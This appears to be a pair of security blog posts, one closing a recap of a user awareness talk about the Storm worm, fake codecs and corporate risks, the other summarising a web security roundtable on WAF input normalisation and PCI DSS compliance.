Another example that seemed to make some people move around a bit in their chairs was the Storm worm’s Halloween spreading mechanism with the dancing skeleton. Especially after I explained what Storm was designed to be able to be used for (credit card gathering, spam, DDoS, well… everything). As I saw their reaction I even threw out an old classic a colleague of mine told me to say: “They can even turn on your webcam and see what you do in the room”. Heh.. yeah.. I know, a bit evil, but it fit perfectly into my talk and they seemed to get the point now.

Now there was not very much time left for me to spend, so I finished off with a recap of the questions from the beginning and also took a short slide on the corporate aspects. If they as private persons could suffer such financial loss and make it easier for others to conduct criminal activities, what could happen if their work computers, or computers that they connected to their workplace with, got compromised? I asked them to consider the following possible implications of this kind of intrusion:

  • Money. Large amounts of money. Either through direct loss or industrial espionage.
  • Money. In the form of work-hours needed to clean up a widescale infection (including specialist help)
  • Brand and Reputation. The damage caused by their network spreading malicious software or distributing confidential client information.
  • Their personal freedom, as in the restrictions put on their browsing, messaging and other aspects. Probably there are some checks on this today, but how will that change after an intrusion? Upper management will want to restrict as much as possible to prevent this from happening again.

Yes, I know the last one is kind of a moot point (as everything should already be locked down) but I needed to give them a personal connection to the trouble that could be caused, and -oh my god- if they cannot access their Hotmail one day ;)

And then I finished off with the “The End - Questions?” slide and took some of them. What was interesting about the questions was that a lot of them were regarding the codec fakes that I had discussed in my “Sound Reason” section. I did not expect this to be as prominent, as most issues we receive through the support line with infections have entered through the web browser with the help of security vulnerabilities or other means; we almost never hear anything about the fake codec angle (good thing?/bad thing? :)). But I guess that Sunbelt Software is really doing a good thing drumming on about the sites that are advertising those.

Ok, that was it. I would really like any comments that you might have, so please drop me a line at: daniel(dot)nystrom ( a ) icmpecho(dot)com!

I downloaded and listened in on the web application security talk that Jeremiah Grossman (WhiteHat Security, coordinators of the talk), Robert “RSnake” Hansen (SecTheory), Chris Paggen (Cisco) and Jordan Wiens (Network Computing) had. This was an unscripted roundtable discussion and it was very interesting to me, as I’m not so skilled in the areas that they discussed (getting there, more on that in later posts). Full info on the talk can be found at:

http://jeremiahgrossman.blogspot.com/2007/11/live-online-roundtable-episode-1.html

For me, the part of the talk dealing with WAFs (web application firewalls) and normalization of input was quite interesting. As discussed, there really is no good way to do it if the customer or developer does not know the way his server and web apps handle input (and output for that matter) and which features are needed. However, if there is good documentation of the web app that is to be protected, you might get away with some normalization (and then why not do it). WAFs in general are not something you “just plug in”, and some more fine tuning will most likely be needed if normalization is something that you want to do.

Another thing that I thought was actually more interesting was hearing these people, who are specialists in web security, discuss the PCI DSS and what their experience with and comments on it were.

One good thing with the PCI DSS is that for a CTO/administrator/security engineer that is really dedicated to providing good security for his company and its clients, the standard can be used to push up security budgets and raise awareness in upper management. However, the money will also have to be well spent, and that’s where some of the participants see a problem.

That problem is that companies and departments with dedicated budgets will try to hold down costs, sometimes even if they have the money needed for a thorough security solution, all for increased profit. This in turn might lead them to cheaper and less reliable certified scanners and vulnerability testers that might not find holes where there actually are plenty. What does this lead to? Well, not much for those trying to fulfil the PCI’s requirements, as they will still pass (AND with no problems detected, wohooo). The cost, as usual, ends up with the customer whose credit card data gets stolen from the site.

An update on this was posted by RSnake (one of the participants) on 11/11-07.

Another topic regarding the PCI DSS that was discussed was its lack of clarity in certain paragraphs, which might lead to total or partial circumvention of the standard. No comments regarding this, but it does indeed sound pretty serious if that’s the case ;)

More information on the PCI DSS here. And I also recommend you all to visit the link in the top of this post and listen to the whole webinar.

Cheers,
